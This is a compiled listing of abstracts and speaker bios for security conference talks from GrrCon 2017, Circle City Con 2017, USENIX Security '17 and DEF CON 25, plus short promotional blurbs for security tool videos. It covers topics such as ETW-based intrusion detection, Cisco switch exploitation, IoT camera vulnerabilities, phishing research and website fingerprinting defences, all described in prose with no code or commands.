GrrCon 2017 – Learning from InfoSec Fails

This presentation will highlight some of the reasons why InfoSec either fails or is perceived to fail. People, Process, and Technology issues will be presented with examples. The goal of this talk is to allow people to pick up some pointers for doing things better by analyzing real world failures. This talk makes use of jaded and cynical humor to get some of the lessons learned across. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – A Reporter’s Look at Open Source Intelligence

Governmental and private agencies provide a vast amount of publicly-available information on individuals and companies for those driven or savvy enough to find it. This talk aims to ease the digital and bureaucratic guesswork from the perspective of an investigative reporter. We,ll go through where and how to find certain types of data, and talk search tips to make the best of any future digital intelligence-gathering efforts. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Hidden Treasure: Detecting Intrusions with ETW

Today, defenders consume the Windows Event Log to detect intrusions. While useful, audit logs don,t capture the full range of data needed for detection and response. ETW (Event Tracing for Windows) is an additional source of events that defenders can leverage to make post-breach activity more visible in Windows. ETW provides a rich set of data, largely intended for debugging scenarios. As a side effect, these traces also have data that is ideal for detecting potentially malicious behavior, such as raw networking data and detailed PowerShell data. Unfortunately, the ETW API is low level and primitive, making it difficult to use at scale reliably. Be- cause our security team in Office 365 supports monitoring over 150,000 machines, we needed a reliable way to consume the events in real-time, while adhering to strict memory and CPU usage constraints. To accomplish this, our team built the open- source krabsetw library to simplify dynamically consuming ETW events. We currently use this library to collect 6.5TB of data per day, from our service. In this talk, we,ll discuss a few ETW sources we,ve found to be high value as well as the detections they enable. We,ll also demo a few examples of using krabsetw to consume them as well as share some strategies for scaling ETW monitoring. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – The Black Art of Wireless Post-Exploitation

Wireless is an inherently insecure protocol. Most companies recognize this, and focus their resources on minimizing the impact of wireless breaches rather than preventing them outright. During red team engagements, the wireless perimeter is cracked within the opening days of the assessment, or it isn,t cracked at all. From an attacker,s perspective, the real challenge lies in moving laterally out of the isolated sandbox in which network administrators typically place their wireless networks. Enterprise network teams are typically aware of this fact, and many will attempt to justify weak wireless perimeter security by pointing out how difficult it is to pivot from the WLAN into production. However, preventing an attacker from doing so is only easy when the network in question is used exclusively for basic functions such as providing Internet connectivity to employees. When wireless networks are used to provide access to sensitive internal infrastructure, the issue of access control gets significantly messier. A door must be provided through which authorized entities can freely traverse. As with cryptographic backdoors, a door that requires a key is a door no less. In this presentation, we will focus on methods through which red team operators can extend their reach further into the network after gaining their initial wireless foothold. We,ll begin with a quick recap on how to use rogue access point attacks to breach all but the most secure implementations of WPA2-EAP. We,ll then demonstrate methods of evading the most commonly used methods of WLAN access control, and explore whether segmentation of a wireless network is truly possible. Finally, we will demonstrate how contemporary network attacks can be combined with wireless man-in-the-middle techniques to create brutal killchains that would be impossible to achieve over a wired medium. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Change is Simply an Act of Survival: Predicting the future while shackled to the past

This presentation will briefly review the history and development of the corporate network, it,s interaction with the Internet and how the adoption of SaaS and PaaS base solutions have rendered the network irrelevant from a security perspective. We will explore recent developments in malware, trends in targets and attack methodologies using case studies. Finally we will then consider one possible future and explore how laying the ground work now will provide a more secure base to work from while improving usability for the Netizens while reigning in costs. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

The Tool Box | QRLJacking

Today's episode of The Tool Box features QRLJacking. We breakdown everything you need to know! Including what it does, who it was developed by, and the best ways to use it! Check out QRLJacking here: Github - https://github.com/OWASP/QRLJacking Website - https://www.owasp.org/index.php/Qrljacking Thanks for watching and don't forget to subscribe to our channel for the latest cybersecurity news! Visit Hacker Arsenal for the latest attack-defense gadgets! https://www.hackerarsenal.com/ FOLLOW US ON: ~Facebook: http://bit.ly/2uS4pK0 ~Twitter: http://bit.ly/2vd5QSE ~Instagram: http://bit.ly/2v0tnY8 ~LinkedIn: http://bit.ly/2ujkyeC ~Google +: http://bit.ly/2tNFXtc ~Web: http://bit.ly/29dtbcn

Circle City Con 2017 – Application Security Metrics

What's your current level of confidence in your application security program? Are you tracking any pen test metrics? Maybe you should. This session will detail several application security metrics used to measure the effectiveness of penetration testing at both program and engagement levels. The presenter will also share real world data from ~ 100 individual pen test engagements performed in 2016. Caroline Wong is the Vice President of Security Strategy at Cobalt. Cobalt delivers crowdsourced pen tests and private bug bounties to modern organizations. Caroline's close and practical information security knowledge stems from broad experience as a Cigital consultant, a Symantec product manager, and day-to-day leadership roles at eBay and Zynga. She is a well known thought leader on the topic of security metrics and has been featured at industry conferences including RSA (USA and Europe), IT Web Summit (South Africa), OWASP AppSec, Metricon, the Executive Women's Forum, ISC2, and the Information Security Forum. Caroline received a 2010 Women of Influence Award in the One to Watch category and authored the popular textbook Security Metrics: A Beginner's Guide, published by McGraw-Hill in 2011. She graduated from U.C. Berkeley with a B.S. in Electrical Engineering and Computer Sciences. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Of Flags, Frogs and 4chan: OPSec vs. Weaponized Autism

This talk will tell the stories of people who got their data leaked, or trolled hard by 4chan because of bad OPSec, and what they could have done better. Internet Hate Machine: Because none of us as are cruel as all of us. ShowMeConVersion because I accidentally mute mic: For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – The State of Security in the Medical Industry

Bringing awareness to the pain felt in the healthcare industry from a security standpoint, what attackers are targeting, and how the industry needs to steer itself to prevent further patient risk and mishandling of data. @cannibal has spent 10 years working in the medical device community. While spending the majority of the time handling defensive security, he recently switched to the attack side after joining the Phobos Group in 2016. The handle "cannibal" comes from dis For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Open Sesamee

Resettable combination locks are popular because they can be set to user-chosen codes. Multiple locks can be set alike to one another. Authorized users don't have to keep track of key or other physical credentials. These locks are often used to control access to construction zones, infrastructure, and sensitive areas (such as utility equipment and cellular towers) across the country. The most popular of these locks is the Master 175. Methods of attacking this lock have been known for some time, however the descriptions and documentation were not readily available. The talk will discuss the best method for decoding this lock and examine the path I took to create my own cutaways and instructional models. In the end, this will hopefully provide people skills both at some home-machining and also help them decode the lock well enough to teach others. Max Power has been working in IT as a jack of all trades but with an fascination for risk and what trust is actually based in. Four years ago he dove straight into the Locksport: running the Boston TOOOL chapter, helping with the lockpick villages at major cons, and actively working in the community. When not at work or picking locks he can found trying to load as much weight as possible on to the bar, training for powerlifting competitions, because nothing is more fun than not bending when the bar does. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – See beyond the veil: Automating malicious javascript deobfuscation

Exploit kits use javascript to direct victim browsers to hosted exploits. These javascript are highly obfuscated to mask their intent and make analysis more difficult. Deobfuscating it manually is time consuming and does not scale. This talk with discuss techniques to automate javascript analysis. Chad Robertson is the Manager of Threat Analysis at Fidelis Cybersecurity. He has worked in incident response, security engineering, and the forensics field for over 10 years in a variety of roles. He has a Bachelors of Science from Purdue University. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Changing our future with 3D Printing

3D Printing represents the last tool that will be necessary is shifting into our new 21st century economy, as we finally break ourselves free from the shackles of the wealth inequality generated during the first three and a half industrial revolutions and the general perversion of economic sensibilities. We will transform our own perceptions of what the world is to become as we grow into second half of the third industrial revolution, and blossom into the totality of the fourth and its wide adoption among society. This is also an important shift in dynamic within the economy as larger corporations turn to automation to lessen their overhead costs and improve profitability. For many of the individuals displaced through automation, we must strive to replace their positions within the economy, provide new growth opportunities, retrain or open the market to be more competitive towards small businesses, and re-empower communities to be self-sufficient. Our definition of prosperity and what we consider a healthy community, economy, environment, and investment system must be restructured. Emily is a writer for IFERS, or the Institute For Education, Research, and Scholarship, a 501(c)3 focused on providing high performing students opportunities for success and fostering associated tools. She spends her time studying high technologies and how they interact with aspects of society, economy, and our future. She has released a podcast that supports shows the behind-the-scenes research and brings cutting-edge topics to the forefront of American debate. She can be reached through knittinggothgirl.com, where more information can be found on writings, podcast materials, and the charity work being conducted. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – You’re not old enough for that: A TLS extension to put the past behind us

TLS evolves rapidly. We don't all have the luxury of upgrading with it, unfortunately; new versions, extensions, cipher suites, and protocols require mutual support. This poses a serious problem for those who have legacy systems that cannot be upgraded (think IoT, or any device that needs certification). Accepting the risk of using a weak (but still sufficient, or better than nothing) protocol with those systems on an interim basis shouldn't imply accepting the risk everywhere. I offer an alternative. I propose a TLS extension that endorses certificates with certain supported features, and then performs a sanity check at the end of establishment or renegotiation. This can be used to detect and prevent downgrade attacks, and doubles as a policy enforcement tool. Falcon is a Shadytel tactical lineman and a Leviathan security consultant. He usually talks about LangSec, and recently published "The Seven Turrets of Babel: A Taxonomy of LangSec Errors and How to Expunge Them". For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – We Don’t Always Go Lights and Sirens

One of the most critical steps to Incident Response is the initial triage phase. The same can be said of the decision Paramedics make when responding to emergency calls. During this presentation we will review how to properly triage an incident based on the information available while relating the process back to real life emergencies. Kendra (@4n6kendra) currently works at Duo Security as an Information Security Analyst. She holds a Bachelor of Science in Digital Forensics and has her CISSP. Throughout her five years working in Information Security, Kendra has had the pleasure of working in several areas including identity and access management, compliance, and a security operations center. Kendra is an advocate for practicing good security hygiene, and regularly conducts security awareness presentations for her community. In her free time, she enjoys watching The Golden Girls and connects the most with Sophia's character because of her lack of a verbal filter. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Ichthyology: Phishing as a Science

Many companies view phishing as a given: employees will click links and enter credentials, and we just need to be okay with that. Phishing prevention usually takes the form of training, and a warning to be careful when reading email. But does phishing training actually work? In this talk, we'll cover the psychology behind successful phishing campaigns, then walk through a series of attacks run against a Bay Area tech company. We'll cover how effective campaigns were built, including bypassing existing protections. Finally, we'll discuss evidence-based techniques to prevent, rather than just mitigate, credential phishing. Karla has a varied offensive security background: she's reverse engineered train ticketing systems, written articles on TLS and SSH, and competed in the Defcon CTF finals for the last several years running. She officially works on authentication and application security at Stripe, but builds internal phishing campaigns when she has business hours to spare. She's triggered many bouts of internal paranoia, and has built a reputation as being entirely untrustworthy when it comes to email. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Creating Your Own Customized Metamorphic Algorithm

Most malware uses metamorphic code to evade Antivirus detection. These techniques also slow down security researchers when digging deeper into the malware code. On the malware side, there are many ways to generate and implements the said algorithms, yet our ultimate goal is to detect them. I joined Fortinet in 2004, and is currently working as a Senior Security Researcher/ AV Team Lead. I am also one of the Lead Trainer responsible for training the junior AV/IPS analysts in malware analysis and reverse engineering. I have presented in different conferences like BSidesVancouver, BSidesCapeBreton, OAS-First, BSidesOttawa, SecTor, DefCamp, BCAware, AtlSecCon, and BSidesCalgary. I am a regular contributor to the Fortinet blog and also in the Virus Bulletin publication, where I have published 22 articles. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Peakaboo – I own you: Owning hundreds of thousands of devices with a broken HTTP packet

Imagine that you've purchased your small a cheap ip security camera to feel just a little better with your own physical security. Now imagine that the people who designed that camera know nothing about secure programming, security or programming at all. Imagine that your precious camera can be hijacked into a botnet with only one broken HTTP packet. Now stop imagining. In the end of 2016, my fellow researcher Yoav Orot and myself published our research paper about a hundreds of thousands of white labeled ip security cameras being vulnerable to a simple attack that allows an attacker to gain complete control of the camera, including code execution as root without any ability to patch. We did not publish any technical details yet since we had to wait for the vendor's answer. This talk will dive deeply into the product, our research process and into the vulnerabilities themselves. I will walk through all of the steps in our research (from hardware hacking to firmware dumping and just plain ol' reversing) and demo the exploits and explain, step by step, where the developers went wrong, what could have been done to avoid this situation and why this problem is so severe. There will be root shells, there will be exploits, there will be tears. Attendees of this talk will leave with some insights about IoT security and embedded device hacking. Amit leads the security research at Cybereason's Boston HQ. He specializes in low-level, vulnerability and kernel research, malware analysis and reverse engineering. He also has extensive experience researching attacks on large scale networks and investigating undocumented OS resources and APIs. Prior to joining Cybereason, Amit spent nine years leading security research projects and teams for the Israeli government, specifically in embedded system security. He's presented at RSA, BSides Tel Aviv and LayerOne. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

USENIX Security ’17 – “I Have No Idea What I’m Doing” – On the Usability of Deploying HTTPS

Katharina Krombholz, Wilfried Mayer, Martin Schmiedecker, and Edgar Weippl, SBA Research Protecting communication content at scale is a difficult task, and TLS is the protocol most commonly used to do so. However, it has been shown that deploying it in a truly secure fashion is challenging for a large fraction of online service operators. While Let’s Encrypt was specifically built and launched to promote the adoption of HTTPS, this paper aims to understand the reasons for why it has been so hard to deploy TLS correctly and studies the usability of the deployment process for HTTPS. We performed a series of experiments with 28 knowledgable participants and revealed significant usability challenges that result in weak TLS configurations. Additionally, we conducted expert interviews with 7 experienced security auditors. Our results suggest that the deployment process is far too complex even for people with proficient knowledge in the field, and that server configurations should have stronger security by default. While the results from our expert interviews confirm the ecological validity of the lab study results, they additionally highlight that even educated users prefer solutions that are easy to use. An improved and less vulnerable workflow would be very beneficial to finding stronger configurations in the wild. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – Beauty and the Burst: Remote Identification of Encrypted Video Streams

Roei Schuster, Tel Aviv University, Cornell Tech; Vitaly Shmatikov, Cornell Tech; Eran Tromer, Tel Aviv University, Columbia University The MPEG-DASH streaming video standard contains an information leak: even if the stream is encrypted, the segmentation prescribed by the standard causes content-dependent packet bursts. We show that many video streams are uniquely characterized by their burst patterns, and classifiers based on convolutional neural networks can accurately identify these patterns given very coarse network measurements. We demonstrate that this attack can be performed even by a Web attacker who does not directly observe the stream, e.g., a JavaScript ad confined in a Web browser on a nearby machine. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – Walkie-Talkie: An Efficient Defense Against Passive Website Fingerprinting Attacks

Tao Wang, Hong Kong University of Science and Technology; Ian Goldberg, University of Waterloo Website fingerprinting (WF) is a traffic analysis attack that allows an eavesdropper to determine the web activity of a client, even if the client is using privacy technologies such as proxies, VPNs, or Tor. Recent work has highlighted the threat of website fingerprinting to privacy-sensitive web users. Many previously designed defenses against website fingerprinting have been broken by newer attacks that use better classifiers. The remaining effective defenses are inefficient: they hamper user experience and burden the server with large overheads. In this work we propose Walkie-Talkie, an effective and efficient WF defense. Walkie-Talkie modifies the browser to communicate in half-duplex mode rather than the usual full-duplex mode; half-duplex mode produces easily moldable burst sequences to leak less information to the adversary, at little additional overhead. Designed for the open-world scenario, Walkie-Talkie molds burst sequences so that sensitive and non-sensitive pages look the same. Experimentally, we show that Walkie-Talkie can defeat all known WF attacks with a bandwidth overhead of 31% and a time overhead of 34%, which is far more efficient than all effective WF defenses (often exceeding 100% for both types of overhead). In fact, we show that Walkie-Talkie cannot be defeated by any website fingerprinting attack, even hypothetical advanced attacks that use site link information, page visit rates, and intercell timing. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – A Privacy Analysis of Cross-device Tracking

Sebastian Zimmeck, Carnegie Mellon University; Jie S. Li and Hyungtae Kim, unaffiliated; Steven M. Bellovin and Tony Jebara, Columbia University Online tracking is evolving from browser- and device-tracking to people-tracking. As users are increasingly accessing the Internet from multiple devices this new paradigm of tracking—in most cases for purposes of advertising—is aimed at crossing the boundary between a user’s individual devices and browsers. It establishes a person-centric view of a user across devices and seeks to combine the input from various data sources into an individual and comprehensive user profile. By its very nature such cross-device tracking can principally reveal a complete picture of a person and, thus, become more privacy-invasive than the siloed tracking via HTTP cookies or other traditional and more limited tracking mechanisms. In this study we are exploring cross-device tracking techniques as well as their privacy implications. Particularly, we demonstrate a method to detect the occurrence of cross-device tracking, and, based on a cross-device tracking dataset that we collected from 126 Internet users, we explore the prevalence of cross-device trackers on mobile and desktop devices. We show that the similarity of IP addresses and Internet history for a user’s devices gives rise to a matching rate of F-1 = 0.91 for connecting a mobile to a desktop device in our dataset. This finding is especially noteworthy in light of the increase in learning power that cross-device companies may achieve by leveraging user data from more than one device. Given these privacy implications of cross-device tracking we also examine compliance with applicable self-regulation for 40 cross-device companies and find that some are not transparent about their practices. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – SmartPool: Practical Decentralized Pooled Mining

Loi Luu, National University of Singapore; Yaron Velner, The Hebrew University of Jerusalem; Jason Teutsch, TrueBit Foundation; Prateek Saxena, National University of Singapore Cryptocurrencies such as Bitcoin and Ethereum are operated by a handful of mining pools. Nearly 95% of Bitcoin’s and 80% of Ethereum’s mining power resides with less than ten and six mining pools respectively. Although miners benefit from low payout variance in pooled mining, centralized mining pools require members to trust that pool operators will remunerate them fairly. Furthermore, centralized pools pose the risk of transaction censorship from pool operators, and open up possibilities for collusion between pools for perpetrating severe attacks. In this work, we propose SMARTPOOL, a novel protocol design for a decentralized mining pool. Our protocol shows how one can leverage smart contracts, autonomous blockchain programs, to decentralize cryptocurrency mining. SMARTPOOL gives transaction selection control back to miners while yielding low-variance payouts. SMARTPOOL incurs mining fees lower than centralized mining pools and is designed to scale to a large number of miners. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – REM: Resource-Efficient Mining for Blockchains

Fan Zhang, Ittay Eyal, and Robert Escriva, Cornell University; Ari Juels, Cornell Tech; Robbert van Renesse, Cornell University Blockchains show promise as potential infrastructure for financial transaction systems. The security of blockchains today, however, relies critically on Proof-of- Work (PoW), which forces participants to waste computational resources. We present REM (Resource-Efficient Mining), a new blockchain mining framework that uses trusted hardware (Intel SGX). REM achieves security guarantees similar to PoW, but leverages the partially decentralized trust model inherent in SGX to achieve a fraction of the waste of PoW. Its key idea, Proof-of-Useful-Work (PoUW), involves miners providing trustworthy reporting on CPU cycles they devote to inherently useful workloads. REM flexibly allows any entity to create a useful workload. REM ensures the trustworthiness of these workloads by means of a novel scheme of hierarchical attestations that may be of independent interest. To address the risk of compromised SGX CPUs, we develop a statistics-based formal security framework, also relevant to other trusted-hardware-based approaches such as Intel’s Proof of Elapsed Time (PoET). We show through economic analysis that REM achieves less waste than PoET and variant schemes. We implement REM and, as an example application, swap it into the consensus layer of Bitcoin core. The result is the first full implementation of an SGX-based blockchain. We experiment with four example applications as useful workloads for our implementation of REM, and report a computational overhead of 5—15%. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – Ensuring Authorized Updates in Multi-user Database-Backed Applications

Kevin Eykholt, Atul Prakash, and Barzan Mozafari, University of Michigan Ann Arbor Database-backed applications rely on access control policies based on views to protect sensitive data from unauthorized parties. Current techniques assume that the application’s database tables contain a column that enables mapping a user to rows in the table. This assumption allows database views or similar mechanisms to enforce per-user access controls. However, not all database tables contain sufficient information to map a user to rows in the table, as a result of database normalization, and thus, require the joining of multiple tables. In a survey of 10 popular open-source web applications, on average, 21% of the database tables require a join. This means that current techniques cannot enforce security policies on all update queries for these applications, due to a well-known view update problem. In this paper, we propose phantom extraction, a technique, which enforces per user access control policies on all database update queries. Phantom extraction does not make the same assumptions as previous work, and, more importantly, does not use database views as a core enforcement mechanism. Therefore, it does not fall victim to the view update problem. We have created SafeD as a practical access control solution, which uses our phantom extraction technique. SafeD uses a declarative language for defining security policies, while retaining the simplicity of database views. We evaluated our system on two popular databases for open source web applications, MySQL and Postgres. On MySQL, which has no built-in access control, we observe a 6% increase in transaction latency. On Postgres, SafeD outperforms the built-in access control by an order of magnitude when security policies involved joins. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – Qapla: Policy compliance for database-backed systems

Aastha Mehta and Eslam Elnikety, Max Planck Institute for Software Systems (MPI-SWS); Katura Harvey, University of Maryland, College Park and Max Planck Institute for Software Systems (MPI-SWS); Deepak Garg and Peter Druschel, Max Planck Institute for Software Systems (MPI-SWS) Many database-backed systems store confidential data that is accessed on behalf of users with different privileges. Policies governing access are often fine-grained, being specific to users, time, accessed columns and rows, values in the database (e.g., user roles), and operators used in queries (e.g., aggregators, group by, and join). Today, applications are often relied upon to issue policy compliant queries or filter the results of non-compliant queries, which is vulnerable to application errors. Qapla provides an alternate approach to policy enforcement that neither depends on application correctness, nor on specialized database support. In Qapla, policies are specific to rows and columns and may additionally refer to the querier’s identity and time, are specified in SQL, and stored in the database itself. We prototype Qapla in a database adapter, and evaluate it by enforcing applicable policies in the HotCRP conference management system and a system for managing academic job applications. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – Data Hemorrhage, Inequality, and You: How Technology and Data Flows are Changing the Civil Liberties Game

Data Hemorrhage, Inequality, and You: How Technology and Data Flows are Changing the Civil Liberties Game Shankar Narayan, Technology and Liberty Project Director, American Civil Liberties Union of Washington Rapidly growing data flows and game-changing advances in aggregation, analytics, and machine learning are changing the game for all of our civil liberties. The public discourse around data often tends to focus on information security, but rarely is inequality at the core of the discussion. Yet we are in a new space where discretion and control over our basic civil liberties is being transferred to private entities from traditional government actors, making it more difficult to recognize threats to our civil liberties, much less respond to them. Our ability to use traditional statutory and constitutional protections is also rendered more challenging by the “tech-washing” of decisions through unaccountable algorithms. The result may be a world in which technology reinforces existing biases everywhere from education to criminal justice, creating a de facto two tier society. This talk will walk through the above dynamics using real-world examples such as police body cameras, advanced metering infrastructure, and other surveillance tools. It will also point to ways to create transparency and accountability around data flows. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

DEF CON 25 – Artem Kondratenko – Cisco Catalyst Exploitation

On March 17th, Cisco Systems Inc. made a public announcement that over 300 of the switches it manufactures are prone to a critical vulnerability that allows a potential attacker to take full control of the network equipment. This damaging public announcement was preceded by Wikileaks' publication of documents codenamed as "Vault 7" which contained information on vulnerabilities and description of tools needed to access phones, network equipment and even IOT devices. Cisco Systems Inc. had a huge task in front of them - patching this vast amount of different switch models is not an easy task. The remediation for this vulnerability was available with the initial advisory and patched versions of IOS software were announced on May 8th 2017. We all heard about modern exploit mitigation techniques such as Data Execution Prevention, Layout Randomization. But just how hardened is the network equipment? And how hard is it to find critical vulnerabilities? To answer that question I decided to reproduce the steps necessary to create a fully working tool to get remote code execution on Cisco switches mentioned in the public announcement. This presentation is a detailed write-up of the exploit development process for the vulnerability in Cisco Cluster Management Protocol that allows a full takeover of the device. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Vivek Ramachandran,Thomas d’Otreppe – Make a 802.11AC Monitor

802.11ac networks present a significant challenge for scalable packet sniffing and analysis. With projected speeds in the Gigabit range, USB Wi-Fi card based solutions are now obsolete! In this workshop, we will look at how to build a custom monitoring solution for 802.11ac using off the shelf access points and open source software. Our "Hacker Gadget" will address 802.11ac monitoring challenges such as channel bonding, DFS channels, spatial streams and high throughput data rates. We will also look different techniques to do live streaming analysis of 802.11 packets and derive security insights from it! For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Tom Sela – Fooling the Hound Deceiving Doman Admin Hunters

The conflict between cyber attackers and defenders is too often in favor of attackers. Recent results of graph theory research incorporated into red-team tools such as BloodHound, shift the balance even more dramatically towards attackers. Any regular domain user can map an entire network and extract the precise path of lateral movements needed to obtain domain admin credentials or a foothold at any other high-value asset. In this talk, we present a new practical defensive approach: deceive the attackers. Since the time of Sun Tzu, deceptions have been used on the battlefield to win wars. In recent years, the ancient military tactic of deceptions has been adopted by the cyber-security community in the form of HoneyTokens. Cyber deceptions, such as fictitious high-privilege credentials, are used as bait to lure the attackers into a trap where they can be detected. To shift the odds back in favor of the defenders, the same BloodHound graphs that are generated by attackers should be used by defenders to determine where and how to place bait with maximum effectiveness. In this way, we ensure that any shortest path to a high-value asset will include at least one deceptive node or edge. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Tan Kean Siong – Stories from a 15 days SMB Honeypot Mum

WannaCry, Eternal Blue, SambaCry are the popular topic recently. During the outbreak in May 2017, we designed a 'real' Windows 7 / Samba server with the open source Dionaea honeypot and exposed the favourable SMB port to the world. There are tons of expected WannaCry attacked the pot, and interestingly there are more juicy collection than that! In this session, we would like to present the stories from a 15 days SMB honeypot. As a honeypot hobbyist, we deployed an emulated Windows 7 machine which implanted with DoublePulsar backdoor. Yes, a Windows system infected with DoublePulsar! Also, our honeypot is up for the CVE 2017-7494 SambaCry vulnerability. We observed tons of scanning which looks for targets to spread the expected WannaCry ransomware. Surprisingly, there are more juicy collection in the pot, e.g. EternalRocks, Reverse Shell, RAT, DDoSers, Coin Miner, Trojan, etc (you name it you have it!). We love to share various interesting data, with the 15 days observation from a single home-based sensor in the entire IP space. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Ron Taylor – Demystifying The OPM breach, WTF Really Happened

In September 2016 the House Committee on oversight finally released their report. Four years after the original breach, we are still asking how the f*#! did this happen. This talk with go over the key findings of the report and the impact on those who were effected. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Brute Logic – XSS For the win

Cross-site Scripting (XSS) is the most widespread plague of the web but is usually restricted to a simple popup window with the infamous vector. In this short talk we will see what can be done with XSS as an attacker or pentester and the impact of it for an application, its users and even the underlying system. Many sorts of black javascript magic will be seen, ranging from simple virtual defacement to create panic with a joke to straightforward and deadly RCE (Remote Command Execution) attacks on at least 25% of the web! For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Sam Erb – You’re Going to Connect to the Wrong Domain Name

Can you tell the difference between gооgle.com and google.com? How about xn--ggle-55da.com and google.com? Both domain names are valid and show up in the Certificate Transparency log. This talk will be a fun and frustrating look at typosquatting, bitsquatting and IDN homoglyphs. This talk will cover the basics, show real-world examples and show how to use Certificate Transparency to track down particularly malicious impersonating domain names which have valid X.509 certificates. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Peter Ewane – Cloudy With A Chance of Persistence

The use of Amazon Cloud as a base of operations for businesses is increasing at a rapid rate. Everyone from 2 person start-ups to major companies have been migrating to the cloud. Because of this migration, cloud vendors have become the focus of potential exploitation and various role abuse in order to achieve persistence. This presentation will cover several different methods of post-infection and account persistence along with a discussion on best practices that can be used to protect from such techniques. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Mike Raggo, Chet Hosmer – Covert TCP with a Twist

Taking a modern day look on the 20 year anniversary of Craig Rowland's article on Covert TCP, we explore current day methods of covert communications and demonstrate that we are not much better off at stopping these exploits as we were 20 years ago. With the explosion of networked devices using a plethora of new wired and wireless protocols, the covert communication exploit surface is paving new paths for covert data exfiltration and secret communications. In this session, we will explore uPnP, Zigbee, WiFi, P25, Streaming Audio Services, IoT, and much more. Through real-world examples, sample code, and demos; we bring to light this hidden world of concealed communications. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Michael Gianarakis ,Keith Lee – Portia

Portia: it's a new tool we have written at SpiderLabs to aid in internal penetration testing test engagements. The tool allows you to supply a username and password that you have captured and cracked from Responder or other sources as well as an IP ranges, subnet or list of IP addresses. The tool finds its way around the network and attempts to gain access into the hosts, finds and dumps the passwords/hashes, reuses them to compromise other hosts in the network. In short, the tool helps with lateral movements in the network and automating privilege escalation as well as find sensitive data residing in the hosts. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Megan Roddie – Strengthen Secops By Leveraging Neurodiversity

High productivity, extreme attention to detail, logical/calculated, passionate, and hyper-focused. These are all characteristics considered valuable in the information security industry. However, a certain group of people who exceed expectations in these skill sets are constantly overlooked for job positions. That group of people is the High Functioning Autistic (HFA) community. Individuals in the high functioning autistic community are often overlooked for job positions due to their social disabilities which makes them perform poorly in an interview and in their interactions with other people. However, if you look past their awkward behavior and social struggles, you will find these individuals are perfectly suited for roles in the information security industry. This talk aims to show the listeners that, as many tech companies have found, the HFA community is ripe with individuals who could be the best of the best in the security industry if given the chance. The audience will realize that a small investment in time, understanding, and acceptance can result in the addition of an invaluable member to a Security Operations team. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Marek Majkowski – IP Spoofing

At Cloudflare we deal with DDoS attacks every day. Over the years, we've gained a lot of experience in defending from all different kinds of threats. We have found that the largest attacks that cause the internet infrastructure to burn are only possible due to IP spoofing. In this talk we'll discuss what we learned about the L3 (Layer 3 OSI stack) IP spoofing. We'll explain why L3 attacks are even possible in today's internet and what direct and reflected L3 attacks look like. We'll describe our attempts to trace the IP spoofing and why attack attribution is so hard. Our architecture allows us to perform most attack mitigations in software. We'll explain a couple of effective L3 mitigation techniques we've developed to stop our servers burning. While L3 attacks are a real danger to the internet, they don't need to be. With a bit of cooperation and couple of technical tricks maybe we can fix the IP spoofing problem for all. For More Information Please Visit:- https://defcon.org/

The Tool Box | SessionGopher

